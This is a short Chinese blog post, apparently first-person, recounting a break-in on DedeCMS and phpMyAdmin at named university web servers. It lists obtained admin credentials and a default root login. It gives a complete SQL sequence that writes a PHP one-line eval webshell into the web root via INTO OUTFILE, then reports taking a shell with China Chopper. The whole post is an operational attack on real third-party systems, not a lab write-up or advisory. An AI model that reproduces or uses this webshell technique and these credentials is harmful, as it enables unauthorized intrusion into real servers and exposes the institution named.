摘要: 今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码 账号:admin 密码:abc123456 但是,找来找去找不到后台,就让我提权试试。 我看了下:http://pxc.ncist.edu.cn/dede/ ...
今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码 账号:admin 密码:abc123456 但是,找来找去找不到后台,就让我提权试试。 我看了下:http://pxc.ncist.edu.cn/dede/ 后台被删除了!怎么办?? google hack也没找到后台 后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin 输入默认MySql账号与密码: 账号:root 密码:root 居然进去了: 接下来就是phpmyadmin提权了: 我的思路是: 1.先爆出php服务器www的路径 2.然后通过将php一句话插入数据库再导出到www路径 通过google hack爆到路径:Dwww 呵呵,接下来就执行sql语句: |
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php'; 这段sql意思是: 1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1 2.将php一句话木马插入数据库中的xss1字段处 3.将数据库中xss1字段的内容导出到d:wwwx.php文件中 这下,通过chopper连接x.php小马得到shell: